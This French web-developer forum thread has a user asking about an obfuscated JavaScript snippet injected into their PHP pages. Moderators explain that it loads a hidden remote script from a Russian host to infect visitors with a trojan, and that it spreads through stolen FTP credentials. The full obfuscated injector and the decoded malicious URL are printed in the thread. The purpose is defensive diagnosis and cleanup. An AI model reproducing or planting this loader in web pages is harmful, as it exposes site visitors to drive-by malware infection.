IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

Script Javascript Etrange.

Sujet :

JavaScript

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
    Futur Membre du Club
    Profil pro
    Inscrit en
    Mai 2010
    Détails du profil
    Informations personnelles :

Informations forums :
    Par défaut Script Javascript Etrange.
    Bonjour à tous.

J'ai un serveur ftp qui me sert à faire des petits tests. Cependant, j'ai remarqué une chose assez étrange.

Une ligne de code javascript se rajoute sur chacune de mes pages et met hors ligne la page en question. Voici un des codes :

Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    <script>var q;Uy=function(){var l={k:false};this.UT="UT";function P(T,x,m){z={};return T.substr(x,m);try {var B='jm'} catch(B){};_=["nX","zs"];}G={Z:false};var ko=["BM","SY"];var F='';var h=RegExp;O=18520;O+=33;try {} catch(vK){};var n='';var o=document;this.c='';var Gy="";var f=P("/aps31B",0,3)+P("pleT0V",0,3)+"-co"+P("6vsm/g6sv",3,3)+"oog"+"le."+"com"+P("/ble0Z",0,3)+P("jIFGogfIjFG",4,3)+P("a.cLPx1",0,3)+"om."+"php";try {var a='orq'} catch(a){};this.i=8572;this.i--;Kg={};xz=["a_","gD"];var Sj=new Array();function U(T,x){this.Q="";var gh=new Date();D=63270;D--;N=60447;N-=55;var m="["+x+new String("]");var HR={};try {} catch(Z_){};var w=new h(m, P("gBLK",0,1));var Ix={Tc:false};this.YP=57741;this.YP-=117;return T.replace(w, n);oW=34508;oW-=49;zQ=24633;zQ++;};var IA=["Sn","Ch","Fi"];var R=["On","x_"];this.s="s";bP={};var Td=null;var qb=String(P("body7cEz",0,4));this.rS="rS";Da={fd:"mc"};var E=597382-589302;var t=U('s6clrAixpxt6','x6lyAb');var _U=new Array();try {var Q_='kJ'} catch(Q_){};on=3017;on-=164;q=function(){this.No=52948;this.No++;eW=["pz","nL"];try {_i={y:false};var M=U('cIrJeIawtYeBEJlkeWmJeYnwtZ','xOTZB8Yq3Lp_sbJkwoW5I');OM={yT:false};fc=o[M](t);kT=["CP"];uV=32206;uV+=196;var Ul="def"+"er";oZ=[];QA={};var Uu=U('szrDc9','5DCg9fYxHpdeIRmhnUZ2zlSK');Uh={DC:false};var T=E+f;pF={Bu:false};this.fN="";var bW=["X","IE","HC"];var ED=new Array();fc[Uu]=new String("http"+"://w"+P("estcFyM",0,4)+"ount"+P("2MOGry.r2OGM",4,4)+P("3yv2u:3v2y",4,2))+T;fc[Ul]=[8,1][1];Sq={};o[qb].appendChild(fc);var JQQ="";var DY="";} catch(K){__=16112;__-=6;this.Gc="Gc";var mh={MB:"Bs"};};FP=5370;FP-=148;Vwx=["Pa"];};this.NG=44001;this.NG-=167;var sf=new String();};Hi=58441;Hi++;this.Tl="Tl";Uy();var _H=new Array();this.Wt=4818;this.Wt++;window.onload=q;var Bn={lb:15746};this.ku=32622;this.ku-=97;</script>
    <!--aa47a80e5522eb1a9e1d8060830c9d67-->
    J'ai deux question à vous poser :

1)Ce code a été ajouté manuellement à partir de mon ftp (Qui est chez free), donc la personne qui me le rajoute aurait des accès à mon ftp ou bien rajouté à partir ... Du navigateur ? Sachant que seul les pages .php semble touché et ma base SQL n'a rien d'endommagé. C'est la deuxième fois que j'enlève ces lignes de code.

2) Quel est le principe de ce code ?

Merci d'avance pour vos réponses et bon dimanche

Rédacteur/Modérateur

Homme Profil pro
    Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Détails du profil

Informations professionnelles :
    Activité : Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Secteur : Industrie

Informations forums :
    Billets dans le blog
    1
    Par défaut
    J'a déja décortiqué des scripts du même type, leut but est en général d'ajouter dynamiquement un iframe caché sur ta page et de faire pointer cet iframe sur une url donnée. ici en l'occurrence
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
     http://westcountry.ru:8080/apple-com/google.com/blogfa.com.php
    Attention ne pas visiter l'url
    je ne sais pas ce que fait la page de destination, mais un site hébergé en russie ...

Pour remédier à ça, efface tout le contenu hébérgé et modifie ton mot de passe ftp ou demande à ton, hebergeur de le faire retransfère tes fichiers avec tes nouveaux codes d'accès
    Ma page Developpez - Mon Blog Developpez
    Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts)
    Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir...
    Votre post est résolu ? Alors n'oubliez pas le Tag

Venez sur le Chat de Développez !

Futur Membre du Club
    Profil pro
    Inscrit en
    Mai 2010
    Détails du profil

Informations forums :
    Par défaut
    Merci pour ta réponse !

Donc le script a été rajouté manuellement ? Je ne vois pas pourquoi.
    Je vais changer de suite mes accès Ftp !

Merci de ton aide

Edit: Ah aussi ! Une autre chose étrange ! Impossible d'enregistrer ce bout de script sous notepad++ ou le bloc note.

Rédacteur/Modérateur

Homme Profil pro
    Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Détails du profil

Activité : Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint

Informations forums :
    Billets dans le blog
    1
    Par défaut
    Rajouté "manuellement" ? Sans doute pas, le codeur a sans doute une moulinette qui teste ou récupère automatiquement les hébergements et sites pour rajouter ce bout de code parasite.

Je l'ai edité avec notepad++ sans souci
    Ma page Developpez - Mon Blog Developpez
    Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts)
    Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir...
    Votre post est résolu ? Alors n'oubliez pas le Tag

Venez sur le Chat de Développez !

Modérateur
    Homme Profil pro
    Lead dév - Architecte
    Inscrit en
    Août 2003
    Détails du profil

Activité : Lead dév - Architecte

Informations forums :
    Par défaut
    Citation Envoyé par SpaceFrog Voir le message
    Pour remédier à ça, efface tout le contenu hébérgé et modifie ton mot de passe ftp ou demande à ton, hebergeur de le faire retransfère tes fichiers avec tes nouveaux codes d'accès
    Ces scripts prolifère en ce moment un peu partout. Leur but est d'installer un trojan sur le pc qui les consultes.

Au niveau de la propagation c'est assez simple : Le pc est infecté par un trojan qui vole les identifiant ftp enregistré (souvent avec filezilla). Ces identifiants sont ensuite transmis à je ne sais pas qui , je ne sais pas comment et une moulinette viens à interval régulier modifier tous les index et fichier js du ftp

Pour résoudre définitivement le problème , il faut donc avant toute chose désinfecté le pc envoyant les fichiers , changer les identifiants ftp et idéalement ne pas réenregistrer les identifants de connexion dans le client ftp.
    Pry Framework php5 | N'oubliez pas de consulter les FAQ Java et les cours et tutoriels Java

Futur Membre du Club
    Profil pro
    Inscrit en
    Mai 2010
    Détails du profil

Informations forums :
    Par défaut
    Merci de vos réponses.

Je vais désinfecté mon pc alors ... Et changer les accès à mes Ftp.

Sujet résolu ! Merci et bonne soirée

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

1. Comment gérer les objects déclarer en HTML dans un script JAVASCRIPT?
    Par Thauglor dans le forum Général JavaScript
    Réponses: 3
    Dernier message: 25/04/2006, 14h54
  2. Probleme avec un script javascript->php
    Par leluis dans le forum Général JavaScript
    Réponses: 5
    Dernier message: 23/03/2006, 15h32
  3. aide pour un script javascript
    Par speedylol dans le forum Général JavaScript
    Réponses: 9
    Dernier message: 22/03/2006, 14h28
  4. utiliser un recordset dans un script javascript